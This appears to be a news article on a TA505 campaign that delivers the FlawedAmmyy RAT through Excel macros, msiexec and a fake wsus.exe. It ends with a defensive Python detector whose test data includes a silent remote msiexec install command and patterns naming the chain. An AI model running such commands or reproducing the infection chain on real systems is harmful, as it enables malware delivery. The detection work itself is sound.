Microsoft Windows is one of the best-known and most widely used PC operating systems in the world, and because of this the company's products are used by the majority of people. That popularity is also one of the reasons it is constantly targeted by hackers, viruses, malware and other infections. Previously, we saw that around 1 million computers running Windows were exposed to a security exploit. Now, the company has made the headlines again as a new malware campaign is attacking Windows systems using the macro functions of Microsoft's own MS Office software. The malware uses a complex infection chain to download and run the FlawedAmmyy RAT malware directly in the PC's memory.
The malware attacks start with an email carrying an .xls attachment. The attachment's content is written in Korean, which hints that the malware is currently targeting Korean users first and foremost. The malware uses malicious macros in the MS Excel spreadsheet attachment to attack the Windows PC.
According to the security firm Proofpoint, the malicious attack campaign was started by a group named TA505. They have been caught in the past using similar patterns to attack PCs with malware. The security firm further states that this time, the group is using a malicious email along with an Excel attachment, which Microsoft itself has asked users not to open.
Microsoft has warned users about the malware attacks using its Twitter account. It has tweeted, “When opened, the .xls file automatically runs a macro function that runs msiexec.exe, and that, in turn, downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run[s], and that decrypts and runs another executable in memory.”
Microsoft has also said that its Threat Protection defends users from this type of attack. According to the company, “Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign.”
Once the user downloads the attachment to their system, the malware also installs a file named wsus.exe. The downloaded file is then decrypted, and it is designed to pass itself off as an official Microsoft Windows Server Update Services (WSUS) component. The file's digital signature is dated June 19, and the file then decrypts the payload it is carrying in RAM. That payload is none other than the FlawedAmmyy RAT, which has a notorious reputation.
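The chain Microsoft describes (Excel macro launches msiexec.exe, which fetches an MSI, which drops a wsus.exe look-alike) is visible to defenders in ordinary process-creation telemetry. The following is an added example written for this article, not code from Microsoft, Proofpoint or the Gadget Bridge team: a small Python checker that runs over constructed, Sysmon-style process-creation events and flags the suspicious parent/child relationships. The event field names (ParentImage, Image, CommandLine), the sample events and the "user-writable path" heuristic for wsus.exe are assumptions made for the example.

```python
"""Flag the Excel -> msiexec -> MSI download chain in process-creation events.

Constructed example; the event layout mimics Sysmon Event ID 1 fields but the
events themselves, and the heuristics, are assumptions, not data from the article.
"""
import re
from typing import Dict, List, Tuple

# Office applications whose macros should never need to launch the Windows Installer.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Windows Installer binary named in Microsoft's description of the chain.
INSTALLER = "msiexec.exe"
# Rough pattern for a remote package location handed to msiexec (assumption).
REMOTE_SOURCE = re.compile(r"https?://\S+", re.IGNORECASE)
# Silent-install switches that hide the installer UI from the victim (assumption).
SILENT_SWITCH = re.compile(r"(^|\s)/(q|quiet|qn)\b", re.IGNORECASE)
# Directories a legitimate update component would not normally run from (assumption).
USER_WRITABLE = re.compile(r"\\(users|temp|appdata)\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event matches the described chain; empty list if none."""
    reasons: List[str] = []
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")

    # Stage 1: an Office macro spawning the Windows Installer.
    if parent in OFFICE_PARENTS and image == INSTALLER:
        reasons.append("office-app spawned msiexec")
        if REMOTE_SOURCE.search(cmdline):
            reasons.append("msiexec given a remote package URL")
        if SILENT_SWITCH.search(cmdline):
            reasons.append("silent install switch")

    # Stage 2: the dropped file posing as a WSUS component, running from a user path.
    if image == "wsus.exe" and USER_WRITABLE.search(event.get("Image", "")):
        reasons.append("wsus.exe executing from a user-writable path")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (image path, reasons) for every event that triggers at least one rule."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event.get("Image", ""), reasons))
    return hits


# Constructed sample events: one malicious msiexec launch, one benign one, one wsus.exe drop.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i http://example.invalid/pkg.msi /q"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi"},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Users\alice\AppData\Local\Temp\wsus.exe",
     "CommandLine": r"wsus.exe"},
]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(reasons)}")
```

The benign msiexec launch from Explorer with a local package is deliberately left unflagged, so the rule keys on the parent process rather than on msiexec alone; in a real deployment the same logic maps onto an EDR or SIEM query over the equivalent fields.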